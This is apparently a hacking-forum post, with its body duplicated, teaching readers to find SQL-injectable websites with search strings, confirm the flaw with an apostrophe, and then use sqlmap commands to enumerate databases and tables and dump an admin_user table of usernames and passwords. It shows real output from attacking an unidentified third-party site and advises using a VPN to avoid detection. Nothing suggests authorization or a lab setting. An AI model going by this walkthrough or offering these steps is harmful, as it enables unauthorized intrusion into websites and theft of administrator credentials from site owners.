- Joined
- May 12, 2016
- Posts
- 1,648
- Reaction
- 790
- Points
- 695
In this thread will learn some basic sqli techniques. For this tutorial you will need python and sqlmap. I will not be going over installation instructions in this thread. If you need help then the following link should suffice..
You do not have permission to view the full content of this post. Log in or register now.
Once you have everything configured it's time to start injecting. You will first need to find an sql vulnerable site. To find vulnerable sites, navigate to your favorite browser and try searching for terms like php?id= , login.php?id= , index.php?id= , etc.
lets exploit this sute
You do not have permission to view the full content of this post. Log in or register now.
Once you found a site you can test it to see if it's vulnerable by adding an apostrophe (') after the link. So my new link should look like this..
You do not have permission to view the full content of this post. Log in or register now.
When I press enter I am presented with this message:
Code:
Error: SELECT * FROM `category` WHERE is_active='1' AND id =200\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
This means that the target url will most likely be vulnerable to sqlihttps://häçkhäçk.net/images/smilies/oui.gif
Now that we are finally able to start the attack, open command prompt in the sqlmap directory and type the following.
Code:
sqlmap.py -u (YOUR TARGET URL) --dbs
In sqlmap the -u command is what specifies the target url. The command --dbs will attempt to pull up the websites databases, notice the double hyphen in --dbs. Whenever there is a double hyphen it will print the output on the screen. So when I type the command above in I am presented with this:
Code:
[21:15:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL >= 5.0
[21:15:52] [INFO] fetching database names
[21:15:52] [INFO] the SQL query used returns 2 entries
[21:15:52] [INFO] resumed: information_schema
[21:15:52] [INFO] resumed: db363851433
available databases [2]:
[*] db363851433
[*] information_schema
[21:15:52] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
[*] shutting down at 21:15:52
As you can see above, the website I'm attacking has two databases. There names are db363851433, and information_schema.
Now that we have found the databases it's time for the next step. In the same terminal type:
Code:
sqlmap -u (YOUR TARGET URL) -D (choose a database) --tables
The -D command will specify a specific database to search. Once again notice the double hyphen in --tables. This will output the tables in the database to the screen. I chose to search the db363851433 database for tables and was presented with this:
Code:
[21:24:02] [INFO] fetching tables for database: 'db363851433'
[21:24:02] [INFO] the SQL query used returns 26 entries
Database: db363851433
[26 tables]
+-----------------------+
| language |
| admin_modules |
| admin_user |
| adminmoduleaccess |
| albums |
| category |
| events |
| gallery |
| left_panel_image |
| login_history |
| maillist |
| member |
| menumanager |
| newsletter_subscriber |
| order_details |
| orders |
| pdfupload |
| product_category |
| product_category_old |
| products |
| resource_countries |
| reviewmanager |
| sitepages |
| slide_box |
| tbl_sitepagesarabic |
| tblnewsletter |
+-----------------------+
[21:24:02] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
By now you should see a trend, with every search we dig deeper into the database looking for sensitive information.
Anyways on with the attack. The output above is a list of tables within the database on the website I chose. At the top of the list notice the table named "admin_user"
Right away I know that this is a sensitive area and probably has some important info. To search one of the tables type the following:
Code:
sqlmap.py -u (YOUR TARGET URL) -D (the database you chose) -T (choose a table) --columns
As I said earlier you should notice the sequence. The -T command specifies the table to search, while the double hyphen in --columns prints the columns on the screen. I decided to search the admin_user table and was presented with this:
Hf firewall blocks the code so I put it here on paste bin
You do not have permission to view the full content of this post. Log in or register now.
It is now time to dump the data. In the columns list notice admin_user_name and admin_pass. These are the two columns I want to dump. To dump these columns type:
Code:
sqlmap -u (URL) -D (the database you chose) -T (the table you chose) -C (choose a column) --dump
sqlmap will present you with a message similar to this one:
Code:
[22:37:54] [INFO] table 'db363851433.admin_user' dumped to CSV file 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
[22:37:54] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
What the message above is saying is that the info you have requested was exported into a csv file, it then gives you the directory in which the csv file is located. in my case the directory is ''C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now."
The admin user name is stored in that csv file, you can dump all the columns and get a lot of important info
p.s
Remember to use a vpn
ciao
-hf
You do not have permission to view the full content of this post. Log in or register now.
Once you have everything configured it's time to start injecting. You will first need to find an sql vulnerable site. To find vulnerable sites, navigate to your favorite browser and try searching for terms like php?id= , login.php?id= , index.php?id= , etc.
lets exploit this sute
You do not have permission to view the full content of this post. Log in or register now.
Once you found a site you can test it to see if it's vulnerable by adding an apostrophe (') after the link. So my new link should look like this..
You do not have permission to view the full content of this post. Log in or register now.
When I press enter I am presented with this message:
Code:
Error: SELECT * FROM `category` WHERE is_active='1' AND id =200\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
This means that the target url will most likely be vulnerable to sqlihttps://häçkhäçk.net/images/smilies/oui.gif
Now that we are finally able to start the attack, open command prompt in the sqlmap directory and type the following.
Code:
sqlmap.py -u (YOUR TARGET URL) --dbs
In sqlmap the -u command is what specifies the target url. The command --dbs will attempt to pull up the websites databases, notice the double hyphen in --dbs. Whenever there is a double hyphen it will print the output on the screen. So when I type the command above in I am presented with this:
Code:
[21:15:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL >= 5.0
[21:15:52] [INFO] fetching database names
[21:15:52] [INFO] the SQL query used returns 2 entries
[21:15:52] [INFO] resumed: information_schema
[21:15:52] [INFO] resumed: db363851433
available databases [2]:
[*] db363851433
[*] information_schema
[21:15:52] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
[*] shutting down at 21:15:52
As you can see above, the website I'm attacking has two databases. There names are db363851433, and information_schema.
Now that we have found the databases it's time for the next step. In the same terminal type:
Code:
sqlmap -u (YOUR TARGET URL) -D (choose a database) --tables
The -D command will specify a specific database to search. Once again notice the double hyphen in --tables. This will output the tables in the database to the screen. I chose to search the db363851433 database for tables and was presented with this:
Code:
[21:24:02] [INFO] fetching tables for database: 'db363851433'
[21:24:02] [INFO] the SQL query used returns 26 entries
Database: db363851433
[26 tables]
+-----------------------+
| language |
| admin_modules |
| admin_user |
| adminmoduleaccess |
| albums |
| category |
| events |
| gallery |
| left_panel_image |
| login_history |
| maillist |
| member |
| menumanager |
| newsletter_subscriber |
| order_details |
| orders |
| pdfupload |
| product_category |
| product_category_old |
| products |
| resource_countries |
| reviewmanager |
| sitepages |
| slide_box |
| tbl_sitepagesarabic |
| tblnewsletter |
+-----------------------+
[21:24:02] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
By now you should see a trend, with every search we dig deeper into the database looking for sensitive information.
Anyways on with the attack. The output above is a list of tables within the database on the website I chose. At the top of the list notice the table named "admin_user"
Right away I know that this is a sensitive area and probably has some important info. To search one of the tables type the following:
Code:
sqlmap.py -u (YOUR TARGET URL) -D (the database you chose) -T (choose a table) --columns
As I said earlier you should notice the sequence. The -T command specifies the table to search, while the double hyphen in --columns prints the columns on the screen. I decided to search the admin_user table and was presented with this:
Hf firewall blocks the code so I put it here on paste bin
You do not have permission to view the full content of this post. Log in or register now.
It is now time to dump the data. In the columns list notice admin_user_name and admin_pass. These are the two columns I want to dump. To dump these columns type:
Code:
sqlmap -u (URL) -D (the database you chose) -T (the table you chose) -C (choose a column) --dump
sqlmap will present you with a message similar to this one:
Code:
[22:37:54] [INFO] table 'db363851433.admin_user' dumped to CSV file 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
[22:37:54] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
What the message above is saying is that the info you have requested was exported into a csv file, it then gives you the directory in which the csv file is located. in my case the directory is ''C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now."
The admin user name is stored in that csv file, you can dump all the columns and get a lot of important info
p.s
Remember to use a vpn
ciao
-hf
